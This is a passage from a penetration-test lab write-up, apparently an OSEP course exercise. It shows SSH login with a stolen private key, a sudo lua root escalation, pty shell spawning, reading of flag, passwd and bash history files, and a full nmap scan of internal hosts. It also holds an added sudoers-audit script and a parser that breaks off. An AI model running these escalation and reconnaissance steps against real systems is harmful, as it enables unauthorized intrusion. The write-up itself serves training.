After obtaining id_rsa, you can log in without a password:
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ **proxychains4 ssh -i id_rsa final\\\\[email protected]** 130 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.184:22 ... OK
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
6 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Nov 2 15:29:24 2020 from 172.16.50.183
[email protected]@ansible06:~$
[email protected]@ansible06:~$ find / -name local.txt 2>/dev/null
/home/[email protected]/local.txt
[email protected]@ansible06:~$ cat /home/[email protected]/local.txt
320cadccfa931d8444d263fd38352908
Privilege escalation reference: https://gtfobins.github.io/gtfobins/lua/
[email protected]@ansible06:~$ sudo -l
Matching Defaults entries for [email protected] on ansible06:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User [email protected] may run the following commands on ansible06:
(ALL) NOPASSWD: /usr/bin/lua
[email protected]@ansible06:~$ **sudo /usr/bin/lua -e 'os.execute("/bin/sh")'**
# id
uid=0(root) gid=0(root) groups=0(root)
# find / -name proof.txt 2>/dev/null
/root/proof.txt
# cat /root/proof.txt
475e008585daee29fbc9d0fc4a5f4491
# **~~python3 -m 'import pty;pty.spawn("/bin/bash")'~~**
/usr/bin/python3: Error while finding module specification for 'import pty;pty.spawn("/bin/bash")' (ModuleNotFoundError: No module named 'import pty;pty')
# python3
Python 3.8.5 (default, Jul 28 2020, 12:59:40)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty
>>> pty.spawn("/bin/bash")
root@ansible06:/home/[email protected]#
# **python3 -c 'import pty; pty.spawn("/bin/bash")'**
root@ansible06:/home/[email protected]#
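The root shell above comes from a single sudoers rule, `(ALL) NOPASSWD: /usr/bin/lua`. The following added example (not part of the original write-up) shows how a defender can audit `sudo -l` output for rules of this kind. The `SHELL_CAPABLE` list, the `USER` placeholder, the second sample rule and all function names are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Non-exhaustive list chosen for this example: programs that can start an
# arbitrary child process, so an unrestricted sudo rule for one is a root shell.
SHELL_CAPABLE = {"lua", "python", "perl", "ruby", "bash", "sh", "env", "vim", "find", "awk"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")

# Constructed sample: the first rule is the one shown on this page, the second
# is made up to exercise tags and pinned arguments. USER is a placeholder.
SAMPLE = r"""Matching Defaults entries for USER on ansible06:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User USER may run the following commands on ansible06:
    (ALL) NOPASSWD: /usr/bin/lua
    (root) /usr/bin/systemctl status ssh, NOPASSWD: /usr/bin/python3.8 /opt/report.py
"""


@dataclass(frozen=True)
class Finding:
    runas: str
    command: str
    nopasswd: bool
    severity: str  # "high": direct root shell; "review": needs a closer look


def classify(command, noexec):
    """Return a severity for one sudo command spec, or None if not flagged."""
    parts = command.split()
    if not parts:
        return None
    if parts[0] == "ALL":
        return "high"
    # /usr/bin/python3.8 -> python, /usr/bin/lua5.3 -> lua
    base = re.sub(r"[\d.]+$", "", parts[0].rsplit("/", 1)[-1])
    if base not in SHELL_CAPABLE:
        return None
    # Pinned arguments or NOEXEC narrow the rule, but the script path and the
    # NOEXEC support of the binary still have to be checked by hand.
    return "review" if len(parts) > 1 or noexec else "high"


def audit_sudo_l(output):
    """Parse `sudo -l` text and return a Finding per risky rule."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = RULE_RE.match(line) if in_rules else None
        if not match:
            continue
        nopasswd = noexec = False  # tags stay in effect for later commands
        for spec in re.split(r"(?<!\\),\s*", match["cmds"]):
            spec = spec.strip()
            while (tag := TAG_RE.match(spec)):
                if tag[1] in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag[1] == "NOPASSWD"
                elif tag[1] in ("NOEXEC", "EXEC"):
                    noexec = tag[1] == "NOEXEC"
                spec = spec[tag.end():]
            severity = classify(spec, noexec)
            if severity:
                findings.append(Finding(match["runas"], spec, nopasswd, severity))
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print(f"[{f.severity}] runas={f.runas} nopasswd={f.nopasswd} {f.command}")
```

A "high" finding means the rule should be removed or replaced with a narrowly scoped wrapper command; interpreters should not appear in sudoers without pinned, root-owned script arguments.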
root@ansible06:/home/[email protected]# **cat /etc/passwd**
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
offsec:x:1000:1000:offsec,,,:/home/offsec:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
sssd:x:127:133:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
ansiblesvc:x:1001:1001:,,,:/home/ansiblesvc:/bin/bash
root@ansible06:/home/[email protected]# **cd /home/ansiblesvc/**
root@ansible06:/home/ansiblesvc# ls -alh
total 84K
drwxr-xr-x 15 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .
drwxr-xr-x 5 root root 4.0K Oct 27 2020 ..
-rw------- 1 ansiblesvc ansiblesvc 523 Oct 27 2020 .bash_history
-rw-r--r-- 1 ansiblesvc ansiblesvc 220 Oct 27 2020 .bash_logout
-rw-r--r-- 1 ansiblesvc ansiblesvc 3.7K Oct 27 2020 .bashrc
drwxr-xr-x 10 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .cache
drwxr-xr-x 11 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .config
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Desktop
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Documents
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Downloads
drwx------ 3 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .gnupg
drwxr-xr-x 3 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .local
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Music
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Pictures
-rw-r--r-- 1 ansiblesvc ansiblesvc 807 Oct 27 2020 .profile
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Public
drwx------ 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .ssh
-rw-r--r-- 1 ansiblesvc ansiblesvc 0 Oct 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Templates
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Videos
-rw------- 1 ansiblesvc ansiblesvc 2.6K Oct 27 2020 y
-rw-r--r-- 1 ansiblesvc ansiblesvc 574 Oct 27 2020 y.pub
root@ansible06:/home/ansiblesvc# cat .bash_history
ssh-keygen
sudo nano /etc/ansible/hosts
**ssh-copy-id [email protected]**
**ping appserver05.dev.final.com**
ssh-copy-id [email protected]
[email protected]
ssh [email protected]
ssh-copy-id [email protected]
ssh-copy-id appserver05.dev.final.com
ls -la
ls ./.ssh/
ssh-keygen
ls ./.ssh/
ssh-copy-id [email protected]
ssh [email protected]
hostname
sudo realm permit -g 'LinuxUsers'
exit
id
sudo su
root@ansible06:/home/ansiblesvc# ping appserver05.dev.final.com
PING appserver05.dev.final.com (172.16.243.197) 56(84) bytes of data.
64 bytes from 172.16.243.197: icmp_seq=1 ttl=64 time=0.821 ms
64 bytes from 172.16.243.197: icmp_seq=2 ttl=64 time=0.253 ms
64 bytes from 172.16.243.197: icmp_seq=3 ttl=64 time=0.384 ms
64 bytes from 172.16.243.197: icmp_seq=4 ttl=64 time=0.382 ms
64 bytes from 172.16.243.197: icmp_seq=5 ttl=64 time=0.359 ms
64 bytes from 172.16.243.197: icmp_seq=6 ttl=64 time=0.326 ms
^C
--- appserver05.dev.final.com ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 14097ms
rtt min/avg/max/mdev = 0.253/0.420/0.821/0.184 ms
root@ansible06:/home/ansiblesvc# **cat /etc/ansible/hosts**
# This is the default ansible 'hosts' file.
#
# It should live in /etc/ansible/hosts
#
# - Comments begin with the '#' character
# - Blank lines are ignored
# - Groups of hosts are delimited by [header] elements
# - You can enter hostnames or ip addresses
# - A hostname/ip can be a member of multiple groups
# Ex 1: Ungrouped hosts, specify before any group headers.
#green.example.com
#blue.example.com
#192.168.100.1
#192.168.100.10
# Ex 2: A collection of hosts belonging to the 'webservers' group
[appservers]
**appserver05.dev.final.com**
#[webservers]
#alpha.example.org
#beta.example.org
#192.168.1.100
#192.168.1.110
# If you have multiple hosts following a pattern you can specify
# them like this:
#www[001:006].example.com
# Ex 3: A collection of database servers in the 'dbservers' group
#[dbservers]
#
#db01.intranet.mydomain.net
#db02.intranet.mydomain.net
#10.25.1.56
#10.25.1.57
# Here's another example of host ranges, this time there are no
# leading 0s:
#db-[99:101]-node.example.com
root@ansible06:/home/[email protected]# ping -c 1 sql03.final.com
PING **sql03.final.com (172.16.243.187)** 56(84) bytes of data.
64 bytes from 172.16.243.187: icmp_seq=1 ttl=128 time=0.239 ms
--- sql03.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
root@ansible06:/home/[email protected]# ping -c 1 sql11.final.com
PING **sql11.final.com (172.16.243.188)** 56(84) bytes of data.
64 bytes from 172.16.243.188: icmp_seq=1 ttl=128 time=0.330 ms
--- sql11.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.330/0.330/0.330/0.000 ms
root@ansible06:/home/[email protected]# ping -c 1 dc01.final.com
PING **dc01.final.com (172.16.243.180)** 56(84) bytes of data.
64 bytes from 172.16.243.180: icmp_seq=1 ttl=128 time=0.204 ms
--- dc01.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.204/0.204/0.204/0.000 ms
root@ansible06:/home/[email protected]# ping -c 1 web05.final.com
PING **web05.final.com (172.16.243.181)** 56(84) bytes of data.
64 bytes from 172.16.243.181: icmp_seq=1 ttl=128 time=0.261 ms
--- web05.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.261/0.261/0.261/0.000 ms
root@ansible06:/home/[email protected]# ping -c 1 jump03.final.com
PING **jump03.final.com (172.16.243.183)** 56(84) bytes of data.
--- jump03.final.com ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
root@ansible06:/home/ansiblesvc# !22
**./run-nmap.sh -Pn -A -p- 172.16.243.180,183,184,187,188,192,194,197**
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-03 22:41 EDT
**Nmap scan report for 172.16.243.180**
Host is up (0.00039s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-04 02:45:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: DC01
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: dc01.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:17+00:00
| ssl-cert: Subject: commonName=dc01.final.com
| Not valid before: 2022-08-02T23:53:34
|_Not valid after: 2023-02-01T23:53:34
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:86:3A:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:86:3a:ad (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-04T02:46:18
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 172.16.243.180
**Nmap scan report for 172.16.243.183**
Host is up (0.00015s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: JUMP03
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: jump03.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:18+00:00
| ssl-cert: Subject: commonName=jump03.final.com
| Not valid before: 2022-08-02T23:54:10
|_Not valid after: 2023-02-01T23:54:10
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:02:35 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms 172.16.243.183
**Nmap scan report for 172.16.243.187**
Host is up (0.00025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL03
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-03T23:54:51
|_Not valid after: 2052-08-03T23:54:51
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL03
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:19+00:00
| ssl-cert: Subject: commonName=sql03.final.com
| Not valid before: 2022-08-02T23:53:45
|_Not valid after: 2023-02-01T23:53:45
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:A0:8F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 172.16.243.187:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-04T02:46:21
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 172.16.243.187
**Nmap scan report for 172.16.243.188**
Host is up (0.00039s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql11.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-03T23:54:31
|_Not valid after: 2052-08-03T23:54:31
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL11
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql11.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:17+00:00
| ssl-cert: Subject: commonName=sql11.final.com
| Not valid before: 2022-08-02T23:53:48
|_Not valid after: 2023-02-01T23:53:48
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:6C:34 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 172.16.243.188:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-04T02:46:18
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 172.16.243.188
**Nmap scan report for 172.16.243.192**
Host is up (0.00037s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-04 02:49:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: DEV
| NetBIOS_Domain_Name: DEV
| NetBIOS_Computer_Name: DC02
**| DNS_Domain_Name: dev.final.com
| DNS_Computer_Name: dc02.dev.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:49:55+00:00
| ssl-cert: Subject: commonName=dc02.dev.final.com
| Not valid before: 2022-08-02T23:54:42
|_Not valid after: 2023-02-01T23:54:42
|_ssl-date: 2022-08-04T02:50:35+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
62215/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:86:E7:1B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: DC02; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC02, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:86:e7:1b (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-04T02:49:55
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 172.16.243.192
**Nmap scan report for 172.16.243.194**
Host is up (0.00037s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final Web Store
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: DEV
| NetBIOS_Domain_Name: DEV
| NetBIOS_Computer_Name: WEB06
**| DNS_Domain_Name: dev.final.com
| DNS_Computer_Name: web06.dev.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:49:56+00:00
| ssl-cert: Subject: commonName=web06.dev.final.com
| Not valid before: 2022-06-19T00:23:29
|_Not valid after: 2022-12-19T00:23:29
|_ssl-date: 2022-08-04T02:50:35+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
**8080/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)**
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final CMS App
MAC Address: 00:50:56:86:5C:EF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-04T02:49:56
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 172.16.243.194
**Nmap scan report for 172.16.243.197**
Host is up (0.00036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 18:e4:25:fa:33:7b:b3:32:d7:96:3e:02:d7:6a:33:e2 (RSA)
| 256 8a:1f:a8:d1:6e:e2:d8:97:bc:81:11:99:00:0a:aa:77 (ECDSA)
|_ 256 5d:80:95:81:b6:03:09:f9:e1:5b:b3:1f:40:1c:1f:55 (ED25519)
MAC Address: 00:50:56:86:45:B3 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 172.16.243.197
**Nmap scan report for ansible06 (172.16.243.184)**
Host is up (0.000025s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ac:88:62:f2:ab:c8:53:7b:41:44:13:11:98:05:e8:75 (RSA)
| 256 07:e2:ae:5f:0d:c0:21:97:d3:a1:67:0d:8a:2f:23:48 (ECDSA)
|_ 256 7f:bb:09:36:bd:21:68:d8:f6:4b:65:b9:9b:56:a6:1e (ED25519)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Post-scan script results:
| clock-skew:
| 0s:
| 172.16.243.187
| 172.16.243.188
| 172.16.243.183
| 172.16.243.180
| 172.16.243.194
|_ 172.16.243.192
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 8 IP addresses (8 hosts up) scanned in 536.10 seconds
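The scan above reports `Message signing enabled but not required` on several hosts and shows RDP and WinRM reachable from the Ansible host. The following added example (not part of the original write-up) parses Nmap's normal text output into a per-host summary so those hardening gaps can be listed. It assumes the flattened output form shown on this page; `MGMT_PORTS` and the function names are this example's own.

```python
import re

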